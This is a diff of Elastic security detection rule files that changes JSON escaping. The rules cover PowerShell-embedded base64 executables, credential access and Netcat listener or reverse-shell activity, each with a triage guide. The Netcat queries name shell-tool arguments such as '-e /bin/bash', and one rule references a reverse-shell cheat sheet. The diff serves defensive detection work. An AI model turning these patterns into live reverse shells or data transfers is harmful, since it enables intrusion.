in-memory capabilities to inject executables into memory without touching the disk, bypassing file-based security protections. These executables are generally base64 encoded.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n TVqQAAMAAAAEAAAA\n ) and not user.id : \"S-1-5-18\"\n", "references": [ "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md" @@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "ad84d445-b1ce-4377-82d9-7c633f28bf9a", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -82,7 +82,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_109.json b/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_109.json index 98bf42b43d7..6e1c561605b 100644 --- a/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_109.json +++ b/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_109.json @@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Suspicious Portable Executable Encoded in Powershell Script", - "note": "## Triage and analysis\n\n### Investigating Suspicious Portable Executable Encoded in Powershell Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell in-memory capabilities to inject executables into memory without touching the disk, bypassing file-based security protections. These executables are generally base64 encoded.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Portable Executable Encoded in Powershell Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell in-memory capabilities to inject executables into memory without touching the disk, bypassing file-based security protections. These executables are generally base64 encoded.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n TVqQAAMAAAAEAAAA\n ) and not user.id : \"S-1-5-18\"\n", "references": [ "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md" @@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "ad84d445-b1ce-4377-82d9-7c633f28bf9a", - "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -82,7 +82,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ad88231f-e2ab-491c-8fc6-64746da26cfe_102.json b/packages/security_detection_engine/kibana/security_rule/ad88231f-e2ab-491c-8fc6-64746da26cfe_102.json index f43e08082b5..f37b61d5882 100644 --- a/packages/security_detection_engine/kibana/security_rule/ad88231f-e2ab-491c-8fc6-64746da26cfe_102.json +++ b/packages/security_detection_engine/kibana/security_rule/ad88231f-e2ab-491c-8fc6-64746da26cfe_102.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/ad88231f-e2ab-491c-8fc6-64746da26cfe_103.json b/packages/security_detection_engine/kibana/security_rule/ad88231f-e2ab-491c-8fc6-64746da26cfe_103.json index 6f36588574a..8eaf01dc3d2 100644 --- a/packages/security_detection_engine/kibana/security_rule/ad88231f-e2ab-491c-8fc6-64746da26cfe_103.json +++ b/packages/security_detection_engine/kibana/security_rule/ad88231f-e2ab-491c-8fc6-64746da26cfe_103.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/ad88231f-e2ab-491c-8fc6-64746da26cfe_104.json b/packages/security_detection_engine/kibana/security_rule/ad88231f-e2ab-491c-8fc6-64746da26cfe_104.json index 400154ffb78..57174d1882f 100644 --- a/packages/security_detection_engine/kibana/security_rule/ad88231f-e2ab-491c-8fc6-64746da26cfe_104.json +++ b/packages/security_detection_engine/kibana/security_rule/ad88231f-e2ab-491c-8fc6-64746da26cfe_104.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/ad88231f-e2ab-491c-8fc6-64746da26cfe_105.json b/packages/security_detection_engine/kibana/security_rule/ad88231f-e2ab-491c-8fc6-64746da26cfe_105.json index 7fe3d5fbc2d..0e52d72cd9c 100644 --- a/packages/security_detection_engine/kibana/security_rule/ad88231f-e2ab-491c-8fc6-64746da26cfe_105.json +++ b/packages/security_detection_engine/kibana/security_rule/ad88231f-e2ab-491c-8fc6-64746da26cfe_105.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_105.json b/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_105.json index effa37dcd27..00a202ffa5d 100644 --- a/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_105.json +++ b/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_105.json @@ -16,7 +16,7 @@ "license": "Elastic License v2", "name": "File Transfer or Listener Established via Netcat", "note": "## Triage and analysis\n\n### Investigating Netcat Network Activity\n\nNetcat is a dual-use command line tool that can be used for various purposes, such as port scanning, file transfers, and connection tests. Attackers can abuse its functionality for malicious purposes such creating bind shells or reverse shells to gain access to the target system.\n\nA reverse shell is a mechanism that's abused to connect back to an attacker-controlled system. It effectively redirects the system's input and output and delivers a fully functional remote shell to the attacker. Even private systems are vulnerable since the connection is outgoing.\n\nA bind shell is a type of backdoor that attackers set up on the target host and binds to a specific port to listen for an incoming connection from the attacker.\n\nThis rule identifies potential reverse shell or bind shell activity using Netcat by checking for the execution of Netcat followed by a network connection.\n\n#### Possible investigation steps\n\n- Examine the command line to identify if the command is suspicious.\n- Extract and examine the target domain or IP address.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - Scope other potentially compromised hosts in your environment by mapping hosts that also communicated with the domain or IP address.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Investigate any abnormal behavior by the subject process such as network connections, file modifications, and any spawned child processes.\n\n### False positive analysis\n\n- Netcat is a dual-use tool that can be used for benign or malicious activity. It is included in some Linux distributions, so its presence is not necessarily suspicious. Some normal use of this program, while uncommon, may originate from scripts, automation tools, and frameworks.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Block the identified indicators of compromise (IoCs).\n- Take actions to terminate processes and connections used by the attacker.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "sequence by process.entity_id\n [process where host.os.type == \"linux\" and event.type == \"start\" and\n process.name:(\"nc\",\"ncat\",\"netcat\",\"netcat.openbsd\",\"netcat.traditional\") and (\n /* bind shell to echo for command execution */\n (process.args:(\"-l\",\"-p\") and process.args:(\"-c\",\"echo\",\"$*\"))\n /* bind shell to specific port */\n or process.args:(\"-l\",\"-p\",\"-lp\")\n /* reverse shell to command-line interpreter used for command execution */\n or (process.args:(\"-e\") and process.args:(\"/bin/bash\",\"/bin/sh\"))\n /* file transfer via stdout */\n or process.args:(\"\u003e\",\"\u003c\")\n /* file transfer via pipe */\n or (process.args:(\"|\") and process.args:(\"nc\",\"ncat\"))\n )]\n [network where host.os.type == \"linux\" and (process.name == \"nc\" or process.name == \"ncat\" or process.name == \"netcat\" or\n process.name == \"netcat.openbsd\" or process.name == \"netcat.traditional\")]\n", + "query": "sequence by process.entity_id\n [process where host.os.type == \"linux\" and event.type == \"start\" and\n process.name:(\"nc\",\"ncat\",\"netcat\",\"netcat.openbsd\",\"netcat.traditional\") and (\n /* bind shell to echo for command execution */\n (process.args:(\"-l\",\"-p\") and process.args:(\"-c\",\"echo\",\"$*\"))\n /* bind shell to specific port */\n or process.args:(\"-l\",\"-p\",\"-lp\")\n /* reverse shell to command-line interpreter used for command execution */\n or (process.args:(\"-e\") and process.args:(\"/bin/bash\",\"/bin/sh\"))\n /* file transfer via stdout */\n or process.args:(\">\",\"<\")\n /* file transfer via pipe */\n or (process.args:(\"|\") and process.args:(\"nc\",\"ncat\"))\n )]\n [network where host.os.type == \"linux\" and (process.name == \"nc\" or process.name == \"ncat\" or process.name == \"netcat\" or\n process.name == \"netcat.openbsd\" or process.name == \"netcat.traditional\")]\n", "references": [ "http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", "https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_106.json b/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_106.json index f208b386b33..d9cfc361b74 100644 --- a/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_106.json +++ b/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_106.json @@ -16,7 +16,7 @@ "license": "Elastic License v2", "name": "File Transfer or Listener Established via Netcat", "note": "## Triage and analysis\n\n### Investigating Netcat Network Activity\n\nNetcat is a dual-use command line tool that can be used for various purposes, such as port scanning, file transfers, and connection tests. Attackers can abuse its functionality for malicious purposes such creating bind shells or reverse shells to gain access to the target system.\n\nA reverse shell is a mechanism that's abused to connect back to an attacker-controlled system. It effectively redirects the system's input and output and delivers a fully functional remote shell to the attacker. Even private systems are vulnerable since the connection is outgoing.\n\nA bind shell is a type of backdoor that attackers set up on the target host and binds to a specific port to listen for an incoming connection from the attacker.\n\nThis rule identifies potential reverse shell or bind shell activity using Netcat by checking for the execution of Netcat followed by a network connection.\n\n#### Possible investigation steps\n\n- Examine the command line to identify if the command is suspicious.\n- Extract and examine the target domain or IP address.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - Scope other potentially compromised hosts in your environment by mapping hosts that also communicated with the domain or IP address.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Investigate any abnormal behavior by the subject process such as network connections, file modifications, and any spawned child processes.\n\n### False positive analysis\n\n- Netcat is a dual-use tool that can be used for benign or malicious activity. It is included in some Linux distributions, so its presence is not necessarily suspicious. Some normal use of this program, while uncommon, may originate from scripts, automation tools, and frameworks.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Block the identified indicators of compromise (IoCs).\n- Take actions to terminate processes and connections used by the attacker.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "sequence by process.entity_id\n [process where host.os.type == \"linux\" and event.type == \"start\" and\n process.name:(\"nc\",\"ncat\",\"netcat\",\"netcat.openbsd\",\"netcat.traditional\") and (\n /* bind shell to echo for command execution */\n (process.args:(\"-l\",\"-p\") and process.args:(\"-c\",\"echo\",\"$*\"))\n /* bind shell to specific port */\n or process.args:(\"-l\",\"-p\",\"-lp\")\n /* reverse shell to command-line interpreter used for command execution */\n or (process.args:(\"-e\") and process.args:(\"/bin/bash\",\"/bin/sh\"))\n /* file transfer via stdout */\n or process.args:(\"\u003e\",\"\u003c\")\n /* file transfer via pipe */\n or (process.args:(\"|\") and process.args:(\"nc\",\"ncat\"))\n )]\n [network where host.os.type == \"linux\" and (process.name == \"nc\" or process.name == \"ncat\" or process.name == \"netcat\" or\n process.name == \"netcat.openbsd\" or process.name == \"netcat.traditional\")]\n", + "query": "sequence by process.entity_id\n [process where host.os.type == \"linux\" and event.type == \"start\" and\n process.name:(\"nc\",\"ncat\",\"netcat\",\"netcat.openbsd\",\"netcat.traditional\") and (\n /* bind shell to echo for command execution */\n (process.args:(\"-l\",\"-p\") and process.args:(\"-c\",\"echo\",\"$*\"))\n /* bind shell to specific port */\n or process.args:(\"-l\",\"-p\",\"-lp\")\n /* reverse shell to command-line interpreter used for command execution */\n or (process.args:(\"-e\") and process.args:(\"/bin/bash\",\"/bin/sh\"))\n /* file transfer via stdout */\n or process.args:(\">\",\"<\")\n /* file transfer via pipe */\n or (process.args:(\"|\") and process.args:(\"nc\",\"ncat\"))\n )]\n [network where host.os.type == \"linux\" and (process.name == \"nc\" or process.name == \"ncat\" or process.name == \"netcat\" or\n process.name == \"netcat.openbsd\" or process.name == \"netcat.traditional\")]\n", "references": [ "http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", "https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_107.json b/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_107.json index 9cbe3f6425c..9e1be5db844 100644 --- a/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_107.json +++ b/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_107.json @@ -16,7 +16,7 @@ "license": "Elastic License v2", "name": "File Transfer or Listener Established via Netcat", "note": "## Triage and analysis\n\n### Investigating Netcat Network Activity\n\nNetcat is a dual-use command line tool that can be used for various purposes, such as port scanning, file transfers, and connection tests. Attackers can abuse its functionality for malicious purposes such creating bind shells or reverse shells to gain access to the target system.\n\nA reverse shell is a mechanism that's abused to connect back to an attacker-controlled system. It effectively redirects the system's input and output and delivers a fully functional remote shell to the attacker. Even private systems are vulnerable since the connection is outgoing.\n\nA bind shell is a type of backdoor that attackers set up on the target host and binds to a specific port to listen for an incoming connection from the attacker.\n\nThis rule identifies potential reverse shell or bind shell activity using Netcat by checking for the execution of Netcat followed by a network connection.\n\n#### Possible investigation steps\n\n- Examine the command line to identify if the command is suspicious.\n- Extract and examine the target domain or IP address.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - Scope other potentially compromised hosts in your environment by mapping hosts that also communicated with the domain or IP address.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Investigate any abnormal behavior by the subject process such as network connections, file modifications, and any spawned child processes.\n\n### False positive analysis\n\n- Netcat is a dual-use tool that can be used for benign or malicious activity. It is included in some Linux distributions, so its presence is not necessarily suspicious. Some normal use of this program, while uncommon, may originate from scripts, automation tools, and frameworks.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Block the identified indicators of compromise (IoCs).\n- Take actions to terminate processes and connections used by the attacker.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and 